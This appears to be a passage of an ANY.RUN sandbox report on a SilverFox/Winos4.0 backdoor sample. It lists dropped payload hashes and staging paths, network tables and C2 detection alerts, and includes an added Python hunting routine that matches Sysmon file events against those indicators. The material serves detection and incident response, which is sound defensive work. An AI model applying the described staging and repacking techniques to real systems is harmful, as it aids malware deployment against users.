Filename: C:\Users\Public\Documents\men.exe
Type: executable
MD5: 32D6EE4492A442C35C6E82CD36D6557C
SHA256: 1F8A204DACD1F803CA12D9C10132E7D63E308037248BFD5D87BE6C69620142C8

PID: 5628
Process: men.exe
Filename: C:\Users\Public\Documents\WindowsData\kail.exe
Type: executable
MD5: F3333DAB07B8D9D7A6B76B9DB8CEEE69
SHA256: 72C33F24FB5853D2EF70ADECE5C7CACEDD8E568A9025F7A82FD5EF5C2F9967C5
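The dropped-file table is the part of this report a responder turns into a hunt: a staging folder (WindowsData) under the world-writable Users\Public\Documents profile, an Inno Setup unpacked installer (the is-XXXXX.tmp naming is Inno Setup's) writing there, and seven hashed payloads. The following is an added example, not part of the ANY.RUN report or of the malware: a Python routine that checks Sysmon-style file events (the field names TargetFilename and Hashes are borrowed from Sysmon; the record layout is an assumption) against the SHA256 values and staging paths listed above. Path and hash are tested independently, so a rebuilt payload dropped to the same folder, or a known binary dropped under a new name, is still flagged. The sample events are constructed for illustration.

```python
"""Added hunting example (not part of the ANY.RUN report): match Sysmon-style
file events against the dropped-file IOCs listed in the report above."""
import hashlib
from typing import Dict, List

# SHA256 values of the artifacts that carry hashes in the "Dropped files" table.
DROPPED_SHA256: Dict[str, str] = {
    "F330E21CF670DA67160937525DD5CA80B1F26C9B3DDDD34ADB2F175D85C485F1": "bypass.exe",
    "96FD836BCD39DE9F57496000A72EEB1163A2A0817E3F814E4212D0ACC93C2736": "is-0FQEL.tmp",
    "5EEEF5659BD2CB872D3D41064A2B295B5876EBE53073A95F46796C68913DB8D5": "me.key",
    "73526196AC0F863BD46F1BD0653CE42C429064E24FAF2AD917FF935E9BBDFFB5": "X.vbe",
    "A411F96323035EDBBE3468D854B161F83CC5A0FA948CEFF524BF82B5FF1C0521": "NVIDIA.exe",
    "1F8A204DACD1F803CA12D9C10132E7D63E308037248BFD5D87BE6C69620142C8": "men.exe",
    "72C33F24FB5853D2EF70ADECE5C7CACEDD8E568A9025F7A82FD5EF5C2F9967C5": "kail.exe",
}

# Staging locations seen in the table: the WindowsData folder under the
# Public profile, plus loose payload files dropped directly beside it.
STAGING_DIR = "c:\\users\\public\\documents\\windowsdata\\"
PUBLIC_DOCS = "c:\\users\\public\\documents\\"
STAGED_EXTS = (".exe", ".tmp", ".dat", ".key", ".vbe")


def parse_sysmon_hashes(field: str) -> Dict[str, str]:
    """Split Sysmon's 'Hashes' field ('MD5=..,SHA256=..') into {ALGO: HEX}."""
    out: Dict[str, str] = {}
    for part in field.split(","):
        algo, sep, value = part.partition("=")
        if sep:
            out[algo.strip().upper()] = value.strip().upper()
    return out


def suspicious_path(path: str) -> bool:
    """True for any file written into the staging folder, or for payload-like
    file types dropped directly under Users\\Public\\Documents."""
    p = path.lower()
    if p.startswith(STAGING_DIR):
        return True
    folder, _, name = p.rpartition("\\")
    return folder + "\\" == PUBLIC_DOCS and name.endswith(STAGED_EXTS)


def match_event(event: Dict[str, str]) -> List[str]:
    """Return the reasons a file event matches the report's IOCs (empty list
    when it does not). Path and hash are checked independently."""
    reasons: List[str] = []
    if suspicious_path(event.get("TargetFilename", "")):
        reasons.append("path: payload staged under Users\\Public\\Documents")
    sha256 = parse_sysmon_hashes(event.get("Hashes", "")).get("SHA256")
    if sha256 in DROPPED_SHA256:
        reasons.append("hash: " + DROPPED_SHA256[sha256])
    return reasons


def scan_events(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each matching TargetFilename to its reasons; non-matches are dropped."""
    hits: Dict[str, List[str]] = {}
    for ev in events:
        reasons = match_event(ev)
        if reasons:
            hits[ev["TargetFilename"]] = reasons
    return hits


def sha256_of_file(path: str) -> str:
    """Upper-case SHA256 of a file on disk, for comparing a live host's
    Public\\Documents contents against DROPPED_SHA256 without Sysmon data."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest().upper()


# Constructed records with Sysmon-style field names; not taken from the report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Public\Documents\men.exe",
     "TargetFilename": r"C:\Users\Public\Documents\WindowsData\bypass.exe",
     "Hashes": "MD5=B423CAF761DF91BA457D3FD6C747E4AA,"
               "SHA256=F330E21CF670DA67160937525DD5CA80B1F26C9B3DDDD34ADB2F175D85C485F1"},
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "TargetFilename": r"C:\Users\admin\Downloads\report.pdf",
     "Hashes": "SHA256=" + "00" * 32},                      # benign, no match
    {"Image": r"C:\Users\Public\Documents\men.exe",
     "TargetFilename": r"C:\Users\Public\Documents\WindowsData\NVIDIA.exe",
     "Hashes": "SHA256=" + "11" * 32},                      # rebuilt payload, new hash
    {"Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Windows\Temp\svc.bin",
     "Hashes": "SHA256=1f8a204dacd1f803ca12d9c10132e7d63e308037248bfd5d87be6c69620142c8"},  # men.exe renamed
]

if __name__ == "__main__":
    for name, why in scan_events(SAMPLE_EVENTS).items():
        print(name, "->", "; ".join(why))
```

Hash comparison is case-insensitive because Sysmon emits upper-case hex while many SIEM normalisations lower-case it; the path rule deliberately ignores the hash so that a repacked drop (the VMProtect tag in this report suggests the payload can be rebuilt cheaply) still surfaces.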
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 18
TCP/UDP connections: 149
DNS requests: 154
Threats: 21

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3948 | svchost.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown |  |  | whitelisted
6504 | updater.exe | GET | 200 | 142.250.181.227:80 | http://c.pki.goog/r/gsr1.crl | unknown |  |  | whitelisted
6504 | updater.exe | GET | 200 | 142.250.181.227:80 | http://c.pki.goog/r/r4.crl | unknown |  |  | whitelisted
6504 | updater.exe | GET | 200 | 142.250.185.163:80 | http://o.pki.goog/we2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTuMJxAT2trYla0jia%2F5EUSmLrk3QQUdb7Ed66J9kQ3fc%2BxaB8dGuvcNFkCEQDPZmByDOs98xJONhjjIZaE | unknown |  |  | whitelisted
 |  | GET |  | 34.104.35.123:80 | http://edgedl.me.gvt1.com/edgedl/diffgen-puffin/%7B8a69d345-d564-463c-aff1-a69d9e530f96%7D/90ee204561905aa512c564e6fd0e8182cfb9a2574f5ebc579bb7a89870bb4441 | unknown |  |  | whitelisted
1380 | SIHClient.exe | GET | 200 | 23.3.109.244:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown |  |  | whitelisted
1268 | svchost.exe | GET | 200 | 23.3.109.244:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown |  |  | whitelisted
1380 | SIHClient.exe | GET | 200 | 23.3.109.244:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown |  |  | whitelisted
1268 | svchost.exe | GET | 200 | 2.16.168.124:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown |  |  | whitelisted
6876 | chrome.exe | GET | 200 | 216.58.206.78:80 | http://clients2.google.com/time/1/current?cup2key=9:Rz7ytO3KsyqLxtMG9CbifabC1KOEPcYjMKOCTTzrvrI&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 | unknown |  |  | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
5944 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:137 |  |  |  | whitelisted
1268 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4944 | RUXIMICS.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:138 |  |  |  | whitelisted
3948 | svchost.exe | 40.126.31.3:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3948 | svchost.exe | 184.30.131.245:80 | ocsp.digicert.com | AKAMAI-AS | US | whitelisted
6648 | updater.exe | 142.250.186.67:443 | update.googleapis.com | GOOGLE | US | whitelisted
6504 | updater.exe | 142.250.185.110:443 | dl.google.com | GOOGLE | US | whitelisted
6504 | updater.exe | 142.250.181.227:80 | c.pki.goog | GOOGLE | US | whitelisted

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 20.73.194.208, 52.191.219.104, 4.231.128.59 | whitelisted
google.com | 216.58.206.78 | whitelisted
login.live.com | 40.126.31.3, 20.190.159.131, 20.190.159.64, 40.126.31.2, 40.126.31.0, 40.126.31.71, 40.126.31.128, 20.190.159.128 | whitelisted
ocsp.digicert.com | 184.30.131.245, 2.17.190.73 | whitelisted
update.googleapis.com | 142.250.186.67 | whitelisted
dl.google.com | 142.250.185.110 | whitelisted
c.pki.goog | 142.250.181.227 | whitelisted
o.pki.goog | 142.250.185.163 | whitelisted
edgedl.me.gvt1.com | 34.104.35.123 | whitelisted
crl.microsoft.com | 2.16.168.124, 2.16.168.114 | whitelisted

Threats

PID | Process | Class | Message
7044 | NtHandleCallback.exe | Malware Command and Control Activity Detected | ET MALWARE Winos4.0 Framework CnC Login Message
7044 | NtHandleCallback.exe | Malware Command and Control Activity Detected | BACKDOOR [ANY.RUN] SilverFox TCP Init Packet
7044 | NtHandleCallback.exe | Malware Command and Control Activity Detected | ET MALWARE Winos4.0 Framework CnC Login Message CnC Server Response
 |  | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
7044 | NtHandleCallback.exe | Malware Command and Control Activity Detected | BACKDOOR [ANY.RUN] SilverFox Encrypted Client Packet
888 | tracerpt.exe | Malware Command and Control Activity Detected | BACKDOOR [ANY.RUN] SilverFox Keep-Alive Client Packet
888 | tracerpt.exe | Malware Command and Control Activity Detected | BACKDOOR [ANY.RUN] SilverFox Keep-Alive Client Packet
6876 | chrome.exe | Not Suspicious Traffic | INFO [ANY.RUN] Google Tag Manager analytics (googletagmanager .com)
6876 | chrome.exe | Not Suspicious Traffic | INFO [ANY.RUN] Google Tag Manager analytics (googletagmanager .com)
888 | tracerpt.exe | Malware Command and Control Activity Detected | BACKDOOR [ANY.RUN] SilverFox Keep-Alive Client Packet

Debug output strings

Process | Message
men.exe | end
chrome.exe | I0000 00:00:1753491072.763831 8144 voice_transcription.cc:58] Registering VoiceTranscriptionCapability